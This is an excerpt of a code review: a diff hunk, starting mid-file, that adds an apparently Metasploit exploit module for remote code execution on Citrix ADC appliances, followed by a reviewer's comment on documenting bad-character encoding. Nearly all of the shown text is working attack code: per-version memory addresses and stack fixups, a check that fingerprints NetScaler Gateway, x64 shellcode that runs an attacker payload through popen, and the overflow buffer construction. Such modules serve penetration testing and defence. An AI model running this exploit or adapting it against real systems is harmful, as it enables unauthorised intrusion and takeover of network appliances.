modules/exploits/freebsd/http/citrix_formssso_target_rce.rb

```diff
@@ -0,0 +1,156 @@
+          'Space' => 2048,
+          'DisableNops' => true
+        },
+        'Targets' => [
+          [
+            'Citrix ADC 13.1-48.47',
+            {
+              'fixup_return' => 0x00782403, # ns_aaa_cookie_valid
+              'fixup_stack_adjustment' => 0x13a8,
+              'popen' => 0x01da6340,
+              'return' => 0x7fff_ffffc1e0,
+              'return_offset' => 168
+            },
+          ],
+          [
+            'Citrix ADC 13.0-91.12',
+            {
+              'fixup_return' => 0x008530a2, # ns_aaa_cookie_valid
+              'fixup_stack_adjustment' => 0x12e0,
+              # in this version the epilogue of ns_aaa_cookie_valid reads directly from rbp and since the exploit
+              # clobbers it, the value needs to be restored and can't be done using relative adjustment like rsp
+              'fixup_rbp' => 0x7fff_fffe3a40,
+              'popen' => 0x01f42ec0,
+              'return' => 0x7fff_fffe25d0,
+              'return_offset' => 168
+            }
+          ]
+        ],
+        'DefaultOptions' => {
+          'RPORT' => 443,
+          'SSL' => true,
+          'WfsDelay' => 10
+        },
+        'DefaultTarget' => 0,
+        'Notes' => {
+          'Stability' => [],
+          'Reliability' => [REPEATABLE_SESSION],
+          'SideEffects' => [IOC_IN_LOGS]
+        }
+      )
+    )
+
+    register_options([
+      OptString.new('TARGETURI', [true, 'Base path', '/'])
+    ])
+  end
+
+  def check
+    res = send_request_cgi({
+      'uri' => normalize_uri(datastore['TARGETURI'], 'epa', 'epa.htm')
+    })
+
+    return CheckCode::Unknown if res.nil?
+
+    return CheckCode::Safe unless res.code == 200 && res.body =~ /<title class="_ctxstxt_NetscalerGateway">/
+
+    CheckCode::Detected
+  end
+
+  def exploit
+    shellcode = Metasm::Shellcode.assemble(Metasm::X64.new, Template.render(<<-SHELLCODE, target: target)).encode_string
+      call loc_popen_arg1
+        ; add this to the path for python payloads
+        db "export PATH=/var/python/bin:$PATH;"
+        db "#{Rex::Text.to_hex(payload.encoded)}", 0
+      loc_popen_arg1:
+        pop  rdi
+
+      call loc_popen_arg2
+        db "r", 0
+      loc_popen_arg2:
+        pop rsi
+
+        mov  rax, <%= target['popen'] %>
+        sub  rsp, 0x200
+        call rax
+
+      loc_return:
+        xor rax, rax
+        <% if target['fixup_rbp'] %>
+        mov rbp, <%= target['fixup_rbp'] %>
+        <% end %>
+        add rsp, <%= target['fixup_stack_adjustment'] + 0x200 %>
+        push     <%= target['fixup_return'] %>
+        ret
+    SHELLCODE
+
+    buffer = rand_text_alphanumeric(target['return_offset']).bytes.map { |b| (b < 0xa0) ? '%%%02x' % b : b.chr }.join
+    buffer << [target['return']].pack('Q').bytes.map { |b| (b == 25) ? '%%%02x' % b : b.chr }.join
+    buffer << shellcode.bytes.map { |b| (b < 0xa0) ? '%%%02x' % b : b.chr }.join
```

Comment:
Maybe add a comment explaining that this block is about encoding away bad chars?